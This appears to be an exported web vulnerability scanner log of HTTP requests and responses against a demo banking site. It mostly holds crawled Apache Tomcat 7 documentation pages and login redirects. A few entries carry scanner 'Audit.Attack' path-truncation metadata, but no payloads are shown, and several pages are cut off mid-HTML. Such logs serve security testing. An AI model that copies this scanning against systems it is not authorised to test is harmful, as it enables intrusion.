colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Config Ref. Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Top Level Elements</strong></p><ul><li><a
href="server.html">Server</a></li><li><a
href="service.html">Service</a></li></ul><p><strong>Executors</strong></p><ul><li><a
href="executor.html">Executor</a></li></ul><p><strong>Connectors</strong></p><ul><li><a
href="http.html">HTTP</a></li><li><a
href="ajp.html">AJP</a></li></ul><p><strong>Containers</strong></p><ul><li><a
href="context.html">Context</a></li><li><a href="engine.html">Engine</a></li><li><a
href="host.html">Host</a></li><li><a href="cluster.html">Cluster</a></li></ul><p><strong>Nested
Components</strong></p><u
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/bank/pay-bills.html

Request:
GET /bank/pay-bills.html HTTP/1.1
Referer: http://zero.webappsecurity.com/online-banking.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="6F2723FE7C386DE06B46E4BC6F7523CF";
PSID="0961B4C9AB7ECE8F80F1EFC03677941C"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="278"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b08a0f65-527f-45d2-8a1d-04fd87389665";
X-Request-Memo: ID="908d55a2-13fb-402e-82cb-57de93725b0b"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 302 Found
Date: Mon, 10 Oct 2016 07:52:10 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Location: http://zero.webappsecurity.com/login.html
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html

Page:

http://zero.webappsecurity.com:80/docs/elapi/index.html

Request:
GET /docs/elapi/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="82703ED3FF1FE7EB55F9833C68BD9964";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="0fcd3620-a2c9-48a7-b968-fb3e787d1d35";
X-Request-Memo: ID="656814d0-5378-4f75-aba7-8f22aebff102"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1318-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1318
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
<!--Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The EL Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/appdev/index.html

Request:
GET /docs/appdev/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="16A0FCA95F27748B361F869AE08E40BF";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="9c8f336d-6c16-4d36-bf1f-618d5455d3d8";
X-Request-Memo: ID="3e48b6e2-1371-49be-b865-795260454474"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"8650-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 8650
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Application Developer's
Guide (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">App Dev Guide Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Contents</strong></p><ul><li><a
href="index.html">Contents</a></li><li><a href="introduction.html">Introduction</a></li><li><a
href="installation.html">Installation</a></li><li><a href="deployment.html">Deployment</a></li><li><a
href="source.html">Source Code</a></li><li><a href="processes.html">Processes</a></li><li><a href="sample/">Example
App</a></li></ul></td><!--RIGHT SIDE MAIN BODY--><td width="80%" valign="top" align="left"
id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0" cellpadding="2"><tr><td
bgcolor="#525D76"><font color="#ffffff"
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/bank/

Request:
GET /bank/ HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="1AE4F834C44267FDE0DE9117CE4C5278";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Relative"; LinkKind="HyperLink";
Locations="Unspecified"; Source="LegacyStaticParser"; ThreadId="280"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1af0b217-7635-47a2-9805-a91973caae93";
X-Request-Memo: ID="a4a8bcd1-1410-44e0-8907-82e278d28a39"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 302 Found
Date: Mon, 10 Oct 2016 07:51:26 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Location: http://zero.webappsecurity.com/login.html
Content-Length: 0
Set-Cookie: JSESSIONID=238461F5; Path=/; HttpOnly
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

Page:

http://zero.webappsecurity.com:80/docs/api/index.html

Request:
GET /docs/api/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="1B53504FE25C2CF2D3F3EE454E68D7B2";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="6b5d1aa8-fc58-4652-bc36-0d5a97c93427";
X-Request-Memo: ID="71ce604a-88a5-4466-bfb8-7fc7b99531b1"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:45 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1329-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1329
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
<!--Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
Tomcat's internal javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/elapi/

Request:
GET /docs/elapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/elapi/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="2CE1DE53F4CF1FCA566114FDBCED92D5";
PSID="82703ED3FF1FE7EB55F9833C68BD9964"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="95"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="bf46b1a5-adb3-4c22-8f66-5315cd71801d";
X-Request-Memo: ID="5791b282-c979-4703-b77b-6a50e9f2cad0"; sc="1"; ThreadId="102";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=EBAB640A
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:28 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1318-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1318
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
<!--Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
The EL Javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/funcspecs/

Request:
GET /docs/funcspecs/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/funcspecs/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="2FBA2CE566E4171CB0A43BE111367406";
PSID="9ED4F10AC6184B9298A6A51C297C202A"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="92"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="c129735e-bc54-496b-9d57-d97a2ebc7697";
X-Request-Memo: ID="472e2d08-dcff-4ae1-92a7-c60c5cfdd5f1"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=02B64950
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:57 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"8461-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 8461
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Catalina Functional
Specifications (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}
div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="../images/tomcat.gif" align="right" alt="
Catalina Functional Specifications
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="../images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="../index.html">Docs Home</a></li><li><a
href="index.html">Functional Specs</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Administrative Apps</strong></p><ul><li><a
href="fs-admin-apps.html">Overall Requirements</a></li><li><a href="mbean-names.html">Tomcat MBean
Names</a></li><li><a href="fs-admin-objects.html">Administered Objects</a></li><li><a href="fs-adminopers.html">Supported Operations</a></li></ul><p><strong>Internal Servlets</strong></p><ul><li><a href="fsdefault.html">Default Servlet</a></li></ul><p><strong>Realm Implementations</strong></p><ul><li><a href="fs-jdbcrealm.html">JDBC Realm</a></li><li><a href="fs-jndi-realm.html">JNDI Realm</a></li><li><a href="fs-memory-realm.h
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/docs/manager-howto.html

Request:
GET /docs/manager-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/manager/html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="112FD5EEB1B0EC04177727EFB7E63F42";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ed87c790-51f7-4bb6-9c73-d612e6966286";
X-Request-Memo: ID="fd6d5ffc-7fab-4458-b31d-4099a01505a6"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"81539-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 81539
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7 (7.0.70) Manager App HOW-TO</title><meta name="author" content="Craig R. McClanahan"><style type="text/css" media="print">
.noPrint {display: none;}
td#mainBody {width: 100%;}
</style><style type="text/css">
code {background-color:rgb(224,255,255);padding:0 0.1em;}
code.attributeName, code.propertyName {background-color:transparent;}

table {
border-collapse: collapse;
text-align: left;
}
table *:not(table) {
/* Prevent border-collapsing for table child elements like <div> */
border-collapse: separate;
}
th {
text-align: left;
}

div.codeBox pre code, code.attributeName, code.propertyName, code.noHighlight, .noHighlight code {


background-color: transparent;
}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border: 1px solid #999;
border-radius: 5px;
background-color: #eff8ff;
display: table; /* To prevent <pre>s from taking the complete available width. */
/*
When it is officially supported, use the following CSS instead of display: table
to prevent big <pre>s from exceeding the browser window:
max-width: available;
width: min-content;
*/
}
div.codeBox pre.wrap {
white-space: pre-wrap;
}

table.defaultTable tr, table.detail-table tr {


border: 1px solid #CCC;
}
table.defaultTable tr:nth-child(even), table.detail-table tr:nth-child(even) {
background-color: #FAFBFF;
}
table.defaultTable tr:nth-child(odd), table.detail-table tr:nth-child(odd) {
background-color: #EEEFFF;
}
table.defaultTable th, table.detail-table th {
background-color: #88b;
color: #fff;
}
table.defaultTable th, table.defaultTable td, table.detail-table th, table.detail-table td {
padding: 5px 8px;
}

p.notice {
border: 1px solid rgb(255, 0, 0);
background-color: rgb(238, 238, 238);
color: rgb(0, 51, 102);
padding: 0.5em;
margin: 1em 2em 1em 1em;
}
</style></head><body bgcolor="#ffffff" text="#000000" link="#525D76" alink="#525D76" vlink="#525D76"><table
border="0" width="100%" cellspacing="0"><!--PAGE HEADER--><tr><td><!--PROJECT LOGO--><a
href="http://tomcat.apache.org/"><img src="./images/tomcat.gif" align="right" alt="
The Apache Tomcat Servlet/JSP Container
" border="0"></a></td><td><h1><font face="arial,helvetica,sanserif">Apache Tomcat 7</font></h1><font
face="arial,helvetica,sanserif">Version 7.0.70, Jun 15 2016</font></td><td><!--APACHE LOGO--><a
href="http://www.apache.org/"><img src="./images/asf-logo.gif" align="right" alt="Apache Logo"
border="0"></a></td></tr></table><table border="0" width="100%" cellspacing="4"><!--HEADER SEPARATOR--><tr><td
colspan="2"><hr noshade size="1"></td></tr><tr><!--LEFT SIDE NAVIGATION--><td width="20%" valign="top" nowrap
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="index.html">Docs Home</a></li><li><a
href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a href="#comments_section">User
Comments</a></li></ul><p><strong>User Guide</strong></p><ul><li><a href="introduction.html">1)
Introduction</a></li><li><a href="setup.html">2) Setup</a></li><li><a href="appdev/index.html">3) First
webapp</a></li><li><a href="deployer-howto.html">4) Deployer</a></li><li><a href="manager-howto.html">5)
Manager</a></li><li><a href="realm-howto.html">6) Realms and AAA</a></li><li><a href="security-managerhowto.html">7) Security Manager</a></li><li><a href="jndi-resources-howto.html">8) JNDI Resources</a></li><li><a
href="jndi-datasource-examples-howto.html">9) JDBC DataSources</a></li><li><a href="class-loader-howto.html">10)
Classloading</a></li><li><a href="jasper-h
...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/docs/api/

Request:
GET /docs/api/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/api/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="443A8D923F5E1E45D620C89F394F32A7";
PSID="1B53504FE25C2CF2D3F3EE454E68D7B2"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
OriginatingEngineID="398bfe9e-1b77-4458-9691-603eea06e341"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="0"; Engine="Path+Truncation";
SmartMode="NonServerSpecificOnly"; ThreadId="90"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="d37af25e-90de-4637-b2cb-7be0413f872a";
X-Request-Memo: ID="cf7103ee-f90b-473e-828d-0c9bed95f904"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=FF9EF2E4
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:07 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1329-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1329
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
<!--Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>API docs</title>
</head>
<body>
Tomcat's internal javadoc is not installed by default. Download and install
the "fulldocs" package to get it.
You can also access the javadoc online in the Tomcat
<a href="http://tomcat.apache.org/tomcat-7.0-doc/">
documentation bundle</a>.
</body>
</html>
Page:

http://zero.webappsecurity.com:80/docs/jspapi/index.html

Request:
GET /docs/jspapi/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="2972AA34C8A6AF245A423BC19C9CD9CE";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
